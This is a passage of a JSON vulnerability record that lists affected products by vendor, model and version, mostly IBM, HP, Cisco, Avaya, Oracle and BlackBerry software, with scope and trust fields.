            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.5"
          },
          {
            "_id": null,
            "model": "java sdk sr16-fp10",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "tivoli access manager for e-business",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "wag310g residential gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "security access manager for mobile",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.4"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.0-14"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.2"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.8"
          },
          {
            "_id": null,
            "model": "rational developer for aix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "sterling control center ifix02",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.10"
          },
          {
            "_id": null,
            "model": "flashcopy manager for oracle",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.0"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.5"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.7"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0o",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler for applications fp02",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.4"
          },
          {
            "_id": null,
            "model": "rational software architect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1"
          },
          {
            "_id": null,
            "model": "link for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.2.1.31"
          },
          {
            "_id": null,
            "model": "system management homepage b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5.146"
          },
          {
            "_id": null,
            "model": "agent desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "10.0(2)"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1.13"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.31 (11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "v3)"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.0"
          },
          {
            "_id": null,
            "model": "messaging application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet12r",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10b",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "idp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "java sdk sr7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "chassis management module 2peo12o",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "ctpos 7.0r4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.038"
          },
          {
            "_id": null,
            "model": "unified attendant console department edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "system management homepage a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.11.197"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.15210"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "flex system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.3.0.0"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.3.3"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.1"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.31"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.3"
          },
          {
            "_id": null,
            "model": "domino fp if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.365"
          },
          {
            "_id": null,
            "model": "junos space",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.3"
          },
          {
            "_id": null,
            "model": "java sdk sr16-fp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "system management homepage 7.4.0a",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.411"
          },
          {
            "_id": null,
            "model": "java sdk sr12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "java sdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "telepresence server on multiparty media",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3204.1"
          },
          {
            "_id": null,
            "model": "image construction and composition tool",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.1.3"
          },
          {
            "_id": null,
            "model": "video surveillance series ip cameras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "60000"
          },
          {
            "_id": null,
            "model": "tape subsystems",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "0"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2.3"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.018"
          },
          {
            "_id": null,
            "model": "system idataplex dx360 m2 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x73210"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.3.2"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.019"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.15"
          },
          {
            "_id": null,
            "model": "enterprise manager ops center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.11"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8zd",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.2"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.51"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4.3"
          },
          {
            "_id": null,
            "model": "rational developer for i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.01"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ae2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v90000"
          },
          {
            "_id": null,
            "model": "cognos planning",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1.1"
          },
          {
            "_id": null,
            "model": "systems insight manager sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "iq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.2.0.5"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35006.1"
          },
          {
            "_id": null,
            "model": "secure work space for bes10/bes12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "12.1.0.150361"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0.1"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "notes fp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.1.1"
          },
          {
            "_id": null,
            "model": "os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "commoncryptolib",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "0"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1.0"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.3.9.3"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 11-b03",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "bes10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "smartcloud entry appliance fp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.4"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5.3"
          },
          {
            "_id": null,
            "model": "db2 connect unlimited advanced edition for system z",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "vgw",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for db2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.0"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.1"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.2.835"
          },
          {
            "_id": null,
            "model": "flashcopy manager for db2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.1.2"
          },
          {
            "_id": null,
            "model": "tivoli storage manager for virtual environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.2.0"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "upward integration modules hardware management pack",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.5.3"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.4"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.7"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1.3"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x325025830"
          },
          {
            "_id": null,
            "model": "jdk update2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "ns oncommand core package",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1.2"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.3"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.2"
          },
          {
            "_id": null,
            "model": "systems insight manager sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "cloud manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.3"
          },
          {
            "_id": null,
            "model": "domino fix pack if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.133"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.1.830"
          },
          {
            "_id": null,
            "model": "system management homepage 7.3.2.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "phaser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "30203.50.01.10"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.32"
          },
          {
            "_id": null,
            "model": "endeca server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.5.1.1"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0c",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "bbm protected on ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.13"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.3"
          },
          {
            "_id": null,
            "model": "video surveillance media server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.7"
          },
          {
            "_id": null,
            "model": "smartcloud entry fp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.110"
          },
          {
            "_id": null,
            "model": "rational build utility",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "telepresence mcu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "84200"
          },
          {
            "_id": null,
            "model": "cms r16.3 r7",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.3.0.12"
          },
          {
            "_id": null,
            "model": "system m2 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x365079470"
          },
          {
            "_id": null,
            "model": "db2 connect enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.16"
          },
          {
            "_id": null,
            "model": "infosphere information analyzer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "rational developer for aix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.01"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.032"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.4"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "as infinity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pexip",
            "version": "2"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5.0"
          },
          {
            "_id": null,
            "model": "os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9.790"
          },
          {
            "_id": null,
            "model": "tivoli netcool configuration manager",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4.1.3"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.0.12"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x363071580"
          },
          {
            "_id": null,
            "model": "ctpos 7.1r1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": "mq appliance m2000",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "api management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "jre update2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "content analysis system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "1.1"
          },
          {
            "_id": null,
            "model": "aura presence services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "jre update15",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.5"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.19"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.10.801"
          },
          {
            "_id": null,
            "model": "aura experience portal sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70006.2"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.0.1"
          },
          {
            "_id": null,
            "model": "java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.0.590"
          },
          {
            "_id": null,
            "model": "java",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.0.600"
          },
          {
            "_id": null,
            "model": "tivoli storage manager for virtual environments",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4.2.0"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "edge digital media player",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3000"
          },
          {
            "_id": null,
            "model": "aura presence services sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp4 ltss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.3"
          },
          {
            "_id": null,
            "model": "jre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.0.50"
          },
          {
            "_id": null,
            "model": "flex system compute node type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x24078630"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.2"
          },
          {
            "_id": null,
            "model": "workcentre r1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "6400061.070.105.25200"
          },
          {
            "_id": null,
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.1"
          },
          {
            "_id": null,
            "model": "aura experience portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.4"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "db2 connect application server advanced edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "thinpro linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "network node manager ispi for ip telephony",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.4"
          },
          {
            "_id": null,
            "model": "gpfs for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2.2"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "flex system manager node types",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "87310"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3.132"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1.5"
          },
          {
            "_id": null,
            "model": "system m4 hdtype",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x365054600"
          },
          {
            "_id": null,
            "model": "norman shark network protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.2.3"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.13"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.3.0"
          },
          {
            "_id": null,
            "model": "rational developer for i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "java sdk sr fp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7910"
          },
          {
            "_id": null,
            "model": "mobile security suite mss",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "jre 1.5.0 08",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.8.0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.1.0.6"
          },
          {
            "_id": null,
            "model": "smartcloud entry appliance fp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.4.0.5"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.4.01"
          },
          {
            "_id": null,
            "model": "aura application server sip core pb5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "53003.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "websphere mq for hp nonstop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "jdk update33",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.21"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1.13"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.2"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.6"
          },
          {
            "_id": null,
            "model": "enterprise manager ops center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
